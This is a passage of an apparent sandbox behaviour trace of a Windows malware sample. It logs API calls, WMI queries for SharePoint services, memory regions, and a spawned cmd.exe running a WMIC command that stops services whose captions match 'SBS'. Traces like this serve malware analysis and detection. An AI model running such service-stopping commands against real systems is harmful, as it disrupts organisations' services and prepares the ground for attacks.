(Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0111.579] CloseHandle (hObject=0x270) returned 1 [0111.579] lstrlenW (lpString="GET") returned 3 [0111.579] lstrlenW (lpString="CALL") returned 4 [0111.579] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0111.579] lstrlenW (lpString="LIST") returned 4 [0111.580] lstrlenW (lpString="CALL") returned 4 [0111.580] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0111.580] lstrlenW (lpString="SET") returned 3 [0111.580] lstrlenW (lpString="CALL") returned 4 [0111.580] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0111.580] lstrlenW (lpString="CALL") returned 4 [0111.580] lstrlenW (lpString="CALL") returned 4 [0111.580] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0111.580] ??0CHString@@QAE@XZ () returned 0x26f8f0 [0111.580] GetCurrentThreadId () returned 0xe38 [0111.580] SysStringLen (param_1="\\\\") returned 0x2 [0111.580] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0111.580] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0111.580] SysStringLen (param_1="\\") returned 0x1 [0111.580] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0111.580] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0111.581] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2f8050, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0x320778) returned 0x0 [0111.586] CoSetProxyBlanket (pProxy=0x320778, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0111.586] ??1CHString@@QAE@XZ () returned 0x74a66430 [0111.587] ??0CHString@@QAE@XZ () returned 0x26f8ec [0111.587] GetCurrentThreadId () returned 0xe38 [0111.587] lstrlenA (lpString="") returned 0 [0111.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x699af0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0111.587] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0111.587] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0111.587] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x7e1f7b56 | out: _String="Select", _Context=0x7e1f7b56) returned="Select" [0111.587] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7e1f7b56 | out: _String=0x0, _Context=0x7e1f7b56) returned="*" [0111.587] lstrlenW (lpString="FROM") returned 4 [0111.587] lstrlenW (lpString="*") returned 1 [0111.587] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0111.587] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7e1f7b56 | out: _String=0x0, _Context=0x7e1f7b56) returned="from" [0111.587] lstrlenW (lpString="FROM") returned 4 [0111.587] lstrlenW (lpString="from") returned 4 [0111.587] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0111.587] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7e1f7b56 | out: _String=0x0, _Context=0x7e1f7b56) returned="Win32_Service" [0111.587] IWbemServices:GetObject (in: This=0x320778, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x26f8c4*=0x0, ppCallResult=0x0 | out: ppObject=0x26f8c4*=0x331698, ppCallResult=0x0) returned 0x0 [0111.626] IWbemClassObject:GetMethod (in: This=0x331698, wszName="STOPSERVICE", lFlags=0, ppInSignature=0x26f8d0, ppOutSignature=0x26f8bc | out: ppInSignature=0x26f8d0*=0x0, ppOutSignature=0x26f8bc*=0x331a18) returned 0x0 [0111.626] IUnknown:Release (This=0x331a18) returned 0x0 [0111.626] IUnknown:Release (This=0x331698) returned 0x0 [0111.626] ??0CHString@@QAE@XZ () returned 0x26f79c [0111.626] GetCurrentThreadId () returned 0xe38 [0111.627] lstrlenA (lpString="") returned 0 [0111.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x699af0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0111.627] lstrlenA (lpString="") returned 0 [0111.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x699af0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0111.627] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0111.627] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0111.627] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x7e1f7bce | out: _String="Select", _Context=0x7e1f7bce) returned="Select" [0111.634] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7e1f7bce | out: _String=0x0, _Context=0x7e1f7bce) returned="*" [0111.634] lstrlenW (lpString="FROM") returned 4 [0111.634] lstrlenW (lpString="*") returned 1 [0111.634] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0111.634] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7e1f7bce | out: _String=0x0, _Context=0x7e1f7bce) returned="from" [0111.634] lstrlenW (lpString="FROM") returned 4 [0111.634] lstrlenW (lpString="from") returned 4 [0111.634] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0111.634] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7e1f7bce | out: _String=0x0, _Context=0x7e1f7bce) returned="Win32_Service" [0111.635] lstrlenA (lpString="SELECT * FROM ") returned 14 [0111.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0x699fb8, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0111.635] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0111.635] SysStringLen (param_1="Win32_Service") returned 0xd [0111.635] lstrlenA (lpString=" WHERE ") returned 7 [0111.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0x699bd0, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0111.635] SysStringLen (param_1=" WHERE ") returned 0x7 [0111.635] SysStringLen (param_1="caption LIKE '%SharePoint%'") returned 0x1b [0111.635] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0111.635] SysStringLen (param_1=" WHERE caption LIKE '%SharePoint%'") returned 0x22 [0111.635] IWbemServices:ExecQuery (in: This=0x320778, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%SharePoint%'", lFlags=48, pCtx=0x0, ppEnum=0x26f7a4 | out: ppEnum=0x26f7a4*=0x3318b0) returned 0x0 [0111.653] CoSetProxyBlanket (pProxy=0x3318b0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0111.654] IEnumWbemClassObject:Next (in: This=0x3318b0, lTimeout=-1, uCount=0x1, apObjects=0x26f7a8, puReturned=0x26f794 | out: apObjects=0x26f7a8*=0x0, puReturned=0x26f794*=0x0) returned 0x1 [0112.298] IUnknown:Release (This=0x3318b0) returned 0x0 [0112.300] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.300] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.300] GetCurrentThreadId () returned 0xe38 [0112.300] ??0CHString@@QAE@PBG@Z () returned 0x26f960 [0112.301] ??YCHString@@QAEABV0@PBG@Z () returned 0x26f960 [0112.301] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x69a020, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0112.301] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.301] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x699a50, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0112.301] __iob_func () returned 0x77ac1208 [0112.301] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0112.302] __iob_func () returned 0x77ac1208 [0112.302] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0112.302] ??1CHString@@QAE@XZ () returned 0x1 [0112.302] IUnknown:Release (This=0x320778) returned 0x0 [0112.302] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0112.302] _kbhit () returned 0x0 [0112.303] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0112.303] WbemLocator:IUnknown:Release (This=0x2f8050) returned 0x2 [0112.303] IUnknown:Release (This=0x320d68) returned 0x0 [0112.304] IUnknown:Release (This=0x320a98) returned 0x0 [0112.304] WbemLocator:IUnknown:Release (This=0x2f8050) returned 0x1 [0112.304] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0112.304] WbemLocator:IUnknown:Release (This=0x2f8050) returned 0x0 [0112.305] CoUninitialize () [0112.325] exit (_Code=0) [0112.325] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.325] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 221 os_tid = 0xe3c Thread: id = 222 os_tid = 0xe44 Thread: id = 223 os_tid = 0xe48 Thread: id = 224 os_tid = 0xe4c Process: id = "46" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x76385000" os_pid = "0xe6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3042 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3043 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3044 start_va = 0x4410000 end_va = 0x442ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 3045 start_va = 0x4430000 end_va = 0x4431fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 3046 start_va = 0x4440000 end_va = 0x4453fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004440000" filename = "" Region: id = 3047 start_va = 0x4460000 end_va = 0x449ffff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 3048 start_va = 0x44a0000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 3049 start_va = 0x45a0000 end_va = 0x45a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 3050 start_va = 0x45b0000 end_va = 0x45b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 3051 start_va = 0x45c0000 end_va = 0x45c1fff entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 3052 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3053 start_va = 0x7e840000 end_va = 0x7e862fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e840000" filename = "" Region: id = 3054 start_va = 0x7e863000 end_va = 0x7e863fff entry_point = 0x0 region_type = private name = "private_0x000000007e863000" filename = "" Region: id = 3055 start_va = 0x7e86c000 end_va = 0x7e86efff entry_point = 0x0 region_type = private name = "private_0x000000007e86c000" filename = "" Region: id = 3056 start_va = 0x7e86f000 end_va = 0x7e86ffff entry_point = 0x0 region_type = private name = "private_0x000000007e86f000" filename = "" Region: id = 3057 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3058 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3059 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 3060 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3061 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 3062 start_va = 0x4730000 end_va = 0x473ffff entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 3063 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3064 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3065 start_va = 0x48a0000 end_va = 0x499ffff entry_point = 0x0 region_type = private name = "private_0x00000000048a0000" filename = "" Region: id = 3066 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3107 start_va = 0x4410000 end_va = 0x441ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004410000" filename = "" Region: id = 3108 start_va = 0x45d0000 end_va = 0x468dfff entry_point = 0x45d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3109 start_va = 0x4690000 end_va = 0x46cffff entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 3110 start_va = 0x4740000 end_va = 0x483ffff entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 3111 start_va = 0x4b10000 end_va = 0x4b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 3112 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3113 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3114 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3115 start_va = 0x7e740000 end_va = 0x7e83ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e740000" filename = "" Region: id = 3116 start_va = 0x7e869000 end_va = 0x7e86bfff entry_point = 0x0 region_type = private name = "private_0x000000007e869000" filename = "" Region: id = 3117 start_va = 0x4420000 end_va = 0x4423fff entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 3118 start_va = 0x4430000 end_va = 0x4433fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 3119 start_va = 0x4b20000 end_va = 0x4e56fff entry_point = 0x4b20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 225 os_tid = 0xe70 [0112.489] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0112.489] __set_app_type (_Type=0x1) [0112.489] __p__fmode () returned 0x77ac4d6c [0112.489] __p__commode () returned 0x77ac5b1c [0112.489] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0112.489] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0112.489] GetCurrentThreadId () returned 0xe70 [0112.489] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe70) returned 0x84 [0112.489] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0112.489] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0112.489] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.493] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0112.493] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x459ff14 | out: phkResult=0x459ff14*=0x0) returned 0x2 [0112.493] VirtualQuery (in: lpAddress=0x459ff1b, lpBuffer=0x459fecc, dwLength=0x1c | out: lpBuffer=0x459fecc*(BaseAddress=0x459f000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0112.493] VirtualQuery (in: lpAddress=0x44a0000, lpBuffer=0x459fecc, dwLength=0x1c | out: lpBuffer=0x459fecc*(BaseAddress=0x44a0000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0112.493] VirtualQuery (in: lpAddress=0x44a1000, lpBuffer=0x459fecc, dwLength=0x1c | out: lpBuffer=0x459fecc*(BaseAddress=0x44a1000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0112.493] VirtualQuery (in: lpAddress=0x44a3000, lpBuffer=0x459fecc, dwLength=0x1c | out: lpBuffer=0x459fecc*(BaseAddress=0x44a3000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0112.493] VirtualQuery (in: lpAddress=0x45a0000, lpBuffer=0x459fecc, dwLength=0x1c | out: lpBuffer=0x459fecc*(BaseAddress=0x45a0000, AllocationBase=0x45a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0112.493] GetConsoleOutputCP () returned 0x1b5 [0112.493] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0112.493] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0112.493] _get_osfhandle (_FileHandle=1) returned 0x3c [0112.493] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0112.494] _get_osfhandle (_FileHandle=1) returned 0x3c [0112.494] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0112.494] _get_osfhandle (_FileHandle=1) returned 0x3c [0112.494] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0112.494] _get_osfhandle (_FileHandle=0) returned 0x38 [0112.494] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0112.494] _get_osfhandle (_FileHandle=0) returned 0x38 [0112.494] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0112.494] GetEnvironmentStringsW () returned 0x48a7dc8* [0112.494] FreeEnvironmentStringsA (penv="A") returned 1 [0112.494] GetEnvironmentStringsW () returned 0x48a7dc8* [0112.495] FreeEnvironmentStringsA (penv="A") returned 1 [0112.495] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x459ee78 | out: phkResult=0x459ee78*=0x94) returned 0x0 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x0, lpData=0x459ee84*=0xb0, lpcbData=0x459ee80*=0x1000) returned 0x2 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x4, lpData=0x459ee84*=0x1, lpcbData=0x459ee80*=0x4) returned 0x0 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x0, lpData=0x459ee84*=0x1, lpcbData=0x459ee80*=0x1000) returned 0x2 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x4, lpData=0x459ee84*=0x0, lpcbData=0x459ee80*=0x4) returned 0x0 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x4, lpData=0x459ee84*=0x40, lpcbData=0x459ee80*=0x4) returned 0x0 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x4, lpData=0x459ee84*=0x40, lpcbData=0x459ee80*=0x4) returned 0x0 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x0, lpData=0x459ee84*=0x40, lpcbData=0x459ee80*=0x1000) returned 0x2 [0112.495] RegCloseKey (hKey=0x94) returned 0x0 [0112.495] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x459ee78 | out: phkResult=0x459ee78*=0x94) returned 0x0 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x0, lpData=0x459ee84*=0x40, lpcbData=0x459ee80*=0x1000) returned 0x2 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x4, lpData=0x459ee84*=0x1, lpcbData=0x459ee80*=0x4) returned 0x0 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x0, lpData=0x459ee84*=0x1, lpcbData=0x459ee80*=0x1000) returned 0x2 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x4, lpData=0x459ee84*=0x0, lpcbData=0x459ee80*=0x4) returned 0x0 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x4, lpData=0x459ee84*=0x9, lpcbData=0x459ee80*=0x4) returned 0x0 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x4, lpData=0x459ee84*=0x9, lpcbData=0x459ee80*=0x4) returned 0x0 [0112.495] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x459ee7c, lpData=0x459ee84, lpcbData=0x459ee80*=0x1000 | out: lpType=0x459ee7c*=0x0, lpData=0x459ee84*=0x9, lpcbData=0x459ee80*=0x1000) returned 0x2 [0112.495] RegCloseKey (hKey=0x94) returned 0x0 [0112.495] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29821 [0112.495] srand (_Seed=0x5ad29821) [0112.495] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE" [0112.495] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE" [0112.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0112.495] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x48a9d20, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0112.495] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0112.495] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0112.496] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0112.496] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0112.496] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0112.496] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0112.496] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0112.496] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0112.496] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0112.496] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0112.496] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0112.496] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0112.496] GetEnvironmentStringsW () returned 0x48a7dc8* [0112.496] FreeEnvironmentStringsA (penv="A") returned 1 [0112.496] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | 